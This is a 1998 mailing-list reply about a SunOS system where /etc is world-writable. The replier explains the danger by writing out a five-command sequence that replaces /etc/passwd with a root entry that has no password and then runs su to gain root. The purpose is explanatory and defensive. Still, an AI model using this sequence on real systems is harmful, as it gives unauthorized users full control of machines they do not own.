Date:      Thu, 17 Dec 1998 22:04:04 -0500 (EST)
From:      "Crist J. Clark" <cjc@cc942873-a.ewndsr1.nj.home.com>
To:        marko@uk.radan.com (Mark Ovens)
Subject:   Re: Basic Security Question

Mark Ovens wrote,

> and on all the Sparcs running SunOS4.1.3_U1 here are:
>
> gppsun4:/{8}% ls -ldug etc
> drwxrwsrwx 10 bin      staff        2048 Dec 17 09:30 etc
>
> which is even less secure as it's writable by all!

I may be dense. Is that some kind of joke or something? As dense as I
am, I know for sure that even I could take any account on a system
with permissions like that and have control of root in this many
keystrokes:

% cd /etc
% echo "root::0:0:Evil Root:/:/bin/csh" > passwd.new
% mv passwd passwd.old
% mv passwd.new passwd
% su
#